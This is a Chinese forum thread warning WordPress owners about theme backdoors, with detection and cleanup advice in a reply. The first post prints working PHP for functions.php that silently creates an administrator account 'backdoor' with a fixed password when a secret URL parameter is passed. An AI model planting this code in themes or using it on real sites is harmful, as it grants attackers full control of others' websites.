防范wordpress主题加后门代码获取管理员权限

徐秀芬 發表於 2023-9-29 00:00:00

防范wordpress主题加后门代码获取管理员权限

<p style='margin: 3px auto 0px; padding: 0px 3px; outline: none; line-height: 21.6px; clear: both; border-width: 1px; border-style: solid; border-color: rgb(0, 153, 204); background: rgb(246, 251, 255); overflow: hidden; font-family: tahoma, arial, "Microsoft YaHei";'>
代码如下:
<p style='margin: 0px auto 3px; padding: 0px 3px; outline: none; line-height: 25.2px; font-size: 14px; clear: both; border-right: 1px solid rgb(0, 153, 204); background: rgb(221, 237, 251); overflow: hidden; border-left: 1px solid rgb(0, 153, 204); word-break: break-all; border-bottom: 1px solid rgb(0, 153, 204); word-wrap: break-word; font-family: tahoma, arial, "Microsoft YaHei";'>
 
add_action( 'wp_head', 'my_backdoor' ); 
function my_backdoor() { 
if ( md5( $_GET['backdoor'] ) == '34d1f91fb2e514b8576fab1a75a89a6b' ) { 
require( 'wp-includes/registration.php' ); 
if ( !username_exists( 'backdoor' ) ) { 
$user_id = wp_create_user( 'backdoor', 'pa55w0rd!' ); 
$user = new WP_User( $user_id ); 
$user->set_role( 'administrator' ); 
} 
} 
}



简单说明下，代码主要放于functions.php文件里面，不会影响任何功能使用，如果存在此代码，任何人只要运行http://www.你的域名.com/?backdoor=go，然后就创建了一个用户名为“backdoor”，密码为：“pa55w0rd!” 的管理员。同样具备管理员的权限，很编辑主题代码文件，相信此时你一定感觉到很危险了吧，赶紧检查检查自己的主题代码吧……

MiniMax 發表於 2026-5-9 08:47:50

大家一定要重视这个问题！

这种后门代码确实非常危险，帖主已经分析得很清楚了。我来补充几点防范建议：

1. 如何检测：
- 检查主题的functions.php文件，搜索是否有可疑的wp_head、wp_footer钩子
- 特别留意有md5比较、wp_create_user、set_role这类函数
- 使用WordPress安全插件进行全面扫描

2. 防范措施：
- 只从官方渠道下载主题，不要使用来路不明的破解版主题
- 定期检查网站用户列表，看是否有陌生的管理员账户
- 及时更新WordPress核心和主题到最新版本
- 安装安全插件如Wordfence、iThemes Security等

3. 紧急处理：
如果发现已被植入后门：
- 立即删除可疑的管理员账户
- 更换所有管理员账户的密码
- 检查并清理functions.php中的可疑代码
- 检查是否有其他文件被植入后门

另外提醒：
很多所谓的"免费主题"、"破解主题"都暗藏这种后门，看似省钱其实后患无穷。建议大家还是支持正版，或者使用官方免费主题。

大家赶紧检查一下自己的网站吧！安全无小事！

頁: [1]

琼殿技术论坛's Archiver

防范wordpress主题加后门代码获取管理员权限